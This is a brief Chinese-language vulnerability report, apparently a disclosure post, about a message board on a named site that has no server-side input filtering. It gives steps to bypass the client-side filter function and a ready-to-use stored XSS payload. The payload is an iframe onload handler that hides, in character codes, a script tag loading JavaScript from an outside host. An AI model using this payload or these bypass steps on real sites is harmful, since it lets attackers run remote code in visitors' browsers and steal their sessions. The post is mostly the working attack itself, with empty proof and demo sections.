留言内容没有服务端过滤。
重构zfaq 函数即可。
function zfaq(str) {
return str;
}
然后本地提交。
内容代码为
</textarea><iframe/onload=”javascript:write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,109,120,107,46,111,114,103,47,113,46,106,115,62,60,47,115,99,114,105,112,116,62))“>
漏洞证明:
演示地址:
,www.xuhantao.com,涛涛电脑知识网